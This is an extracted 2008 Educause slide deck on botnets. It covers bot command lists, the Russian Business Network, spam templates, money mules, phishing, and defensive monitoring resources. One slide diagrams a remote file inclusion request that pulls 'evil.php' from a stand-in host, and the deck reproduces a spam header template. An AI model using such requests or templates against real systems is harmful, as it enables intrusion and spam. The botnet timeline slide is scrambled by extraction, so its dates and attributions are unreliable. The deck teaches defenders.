Professional Documents
Culture Documents
A Presentation
For
Educause Security Professionals 2008
by
Craig A Schiller, CISSP-ISSMP, ISSAP
Portland State University
CISO
craigs@pdx.edu
Copyright Craig Schiller, 2008. This work is the intellectual property of the author.
Permission is granted for this material to be shared for non-commercial, educational
purposes, provided that this copyright statement appears on the reproduced
materials and notice is given that the copying is by permission of the author. To
disseminate otherwise or to republish requires written permission from the author.
Agenda
Botnet Overview
Botnet Schemes
How Do They Get In?
What Can We Do?
Concluding Thoughts
IRC protocol
Bot
Bot
Bot
Bot
Bot
Remote
controlled
clients
Terminal Services
VNC
RDP
Carbon copy
BackOrifice
SubSeven
Now, many include the systems that execute commands of the botherder even if the
malicious code is not present. These systems are remotely controlled. They would
be considered bot clients if they were part of a net of remotely controlled clients,
even if the bot mechanism is somewhere else.
2008 Craig A Schiller
Botnet Commands
Command
bot.command
bot.flushdns
bot.quit
bot.longuptime
bot will
bot.sysinfo
bot.status
bot.rndnick
bot.remove
bot.open
bot.nick
bot.id
shell.disable
shell.enable
shell.handler
commands.list
plugin.unload
supported yet)
plugin.load
inst.svcdel
inst.svcadd
mac.login
What it does
Runs a command with system()
Flushes the bots DNS cache
Quits the bot
If uptime is more than 7 days,
respond
Displays the system info
Gives status
generate a new random nick
Removes the bot
Opens a file
Changes the bots nickname
Displays the current code ID
Disable shell handler
Enable shell handler
Fallback handler for shell
Lists all available commands
Unloads a plug-in (not
Loads a plug-in
Deletes a service
Adds a service
Logs the user in
10
2003
2002
SpyBot
SDBot, written in C++
Spyware capabilities
Source code Available
(keylogging,
to hacker community data mining for email addresses
2004
Small, single binary
1999
Lists of URLs,etc)
PolyBot
Pretty Park discovered
A derivative of AgoBot with
Polymorphic abilty. Changes its the
first worm to use an IRC server
look of its code on every infection
as a means of remote control
1988
Invention of IRC
1989
1990
1991
1992
1993
1994
1995
1996
1997
1998
1999
2000
2001
1988
1989
Greg Lindahl invents GM the first Bot,
GM plays Hunt the Wumpus with IRC users
2002
2003
2004
2005
2006
2006
1999
SubSeven trojan/bot
A remote control trojan
added control via IRC
2005
MYTOB
My Doom
mass emailing worm
with Bot IRC C&C
2002
2003
AgoBot, Gaobot
RBot
Introduces
modular
design
2000
Most Prevalent Bot today
1st module breaks-in
GT Bot, mIRC based
Spreads through
nd
module
downloads
2
Runs scripts in response tond
weak
passwords,
IRC server events 2 module turns off anti-virus easilty modifieable,
Hides
from
detection,
Supports raw TCP and UDP
Uses packaging software
downloads 3rd module
Socket connections
Module 3 has attack
Page 1
engines/payload
11
$$
2008 Craig A Schiller
12
12 Levashovskiy Prospect.
197110 Saint-Petersburg, - RU
11/21/07
Ref: David Bizeul
Bizeul.org
Russian Business Network study, by David Bizeul
2008 Craig A Schiller
13
RBN Operations
Services: Some external services are used by
RBN and affiliates. Those services can be MX
relay or NS hosting.
RBN: This is the core business of RBN. It is
used to offer Hosting for cybercrime. Inside this
part, we can identify the direct subsidiaries from
RBN : Nevacon and Akimon.
Hosting: This is the part used to host most of
RBN public websites, to register RBN domain
names Hosting and registration is a really
strong partner for RBN. Incidentally, it could be
possible that those two blocks are under the
same company.
Telecom: This is the entity which aims at
providing the Internet access. It seems that
SBTel has obtained from Silvernet to access
Saint Petersburg Internet Exchange Point
(SPBIX).
11/21/07
Ref: Bizeul.org -
14
RBN Operations
SILVERNET
CREDOLINK
RBN
OINVEST
SPB IX
DELTASYS
INFOBOX
DATAPOINT
15
1018
49
23
21
17
13
11
10
9
7
7
6
5
5
3
3
2
2
2
CZ
RU
RU
RU
RU
HK
TW
AE
RU
RU
TR
RU
HK
US
MY
RU
RU
TR
TW
16
Botnet animation
17
18
Modular
Adaptive
Targetable
19
Spam
20
21
Spam Template
Received: from 192.168.0.%RND_DIGIT
(203-219-%DIGSTAT2-%STATDIG.%RND_FROM_DOMAIN [203.219.%DIGSTAT2.%STATDIG])
by mail%SINGSTAT.%RND_FROM_DOMAIN (envelope-from %FROM_EMAIL)
(8.13.6/8.13.6) with SMTP id %STATWORD for <%TO_EMAIL>; %CURRENT_DATE_TIME
Message-Id: <%RND_DIGIT[10].%STATWORD@mail%SINGSTAT.%RND_FROM_DOMAIN>
From: "%FROM_NAME" <@%FROM_EMAIL>
X-Spam-Flag: YES
X-Scanned-By: milter-spamc/0.25.321 (localhost [0.0.0.0]); Thu, 01 Mar 2007
09:14:01 -0600
X-Scanned-By: milter-spamc/0.25.321 (miconsulting.com [66.34.157.130]);
Thu, 01 Mar 2007 09:14:01 -0600
X-Spam-Status: YES, hits=8.60 required=5.00
X-Spam-Level: xxxxxxxx
Subject: [SPAM]
Status: RO
%TO_CC_DEFAULT_HANDLER
Subject: %SUBJECT
Sender: "%FROM_NAME" <%FROM_EMAIL>
Mime-Version: 1.0
Content-Type: text/html
Date: %CURRENT_DATE_TIME
%MESSAGE_BODY
2008 Craig A Schiller
22
SymboL: PSCP
Current Price: $0.35
5 Day Target price: 1.75
Action: Aggresive Buy
23
24
25
26
27
Extortion
28
29
30
Phishing Overview
Botnet Client
Hosts phishing
website
Botnet Client
Sends spam
2008 Craig A Schiller
31
Money Mule
Fraudsters contact prospective victims
I am Mr. Richard H. Mason President/CEO MM Group Handling.
We are a trading company that is into the hire, sales and service of Electrical
Trucks, Fork Trucks and associated materials handling equipments and diverse
range of battery for electric vehicles which can be readily adapted for customers
specific requirements to the America and selected locations in Europe.
We are searching for individuals or a company who can act as our
representative/payment agent in your country and earn 10% of every payment
made through you to us.
2. The crime rings persuade the victim to come and work for their fake
company.
3. Money mules receive funds into their accounts.
These funds are stolen from other accounts that have been compromised.
4. Mules then are asked to take these funds out of their accounts and
forward them overseas (minus a commission payment), typically using a
wire transfer service.
Source: Bank Safe Online
2008 Craig A Schiller
32
33
pointing
pointing
pointing
pointing
pointing
pointing
to
to
to
to
to
to
127.0.0.1
127.0.0.2
127.0.0.3
127.0.0.4
127.0.0.5
127.0.0.6
34
The above animation demonstrates a persistent phishing cluster detected and analyzed by InternetPerils using server addresses from 20 dumps of the APWG repository, the
earliest shown 17 May and the latest 20 September. This phishing cluster continues to persist after the dates depicted, and InternetPerils continues to track it.
35
36
37
1. Get /a.php?vuln=http://webhost.com/evil.php
4. The Output from evil.php is sent to Attacker
Target.com
Attacker
38
39
40
41
42
43
Best Bot left the A/V tray icon and a fake GUI
44
45
Nothing Important
Your space, network, & processing power
I checked
and
I
didnt
see
anything
Child Pornography
Bestiality
Stolen movies, games, & software
Your access
Student records
SSAN
University resources
Your email
Your money
Your identity
2008 Craig A Schiller
46
Nothing Important
I checked and I didnt see anything
47
48
Computer is
Exploited
Becomes a Bot
A/V
Detection
Download server
C&C
C&C
Report Result to
the C&C Channel
Retrieve the
Payload module
Execute the
commands
Download server
On Command,
Erase all evidence
and abandon the
client
49
I checked
and I didnt see anything
A/V, Anti-Spam, Anti-Spyware
Host based
Enterprise Reporting
User Help Desk Tickets
Abuse notifications
Quasi-Intelligence Organizations
Monitoring & Analysis
Ourmon
Firewall & Router logs
IDS/IPS Host and Network
Darknets, Honeypots
DNS
Server & Workstation Log analysis
Malware analysis (Sandbox)
Forensics
2008 Craig A Schiller
50
Quasi-Intelligence Organizations
Mailing lists
REN-ISAC
Botnet
Shadowserver
http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
Phishing
Nanog
http://www.whitestar.linuxbox.org/mailman/listinfo/phishing
Castlecops.com
Vendor
MIRT
ISC Storm Center
PIRT
APWG
http://www.bleedingthreats.net/fwrules/
2008 Craig A Schiller
51
Closing Thoughts
52
Q&A
Questions?
53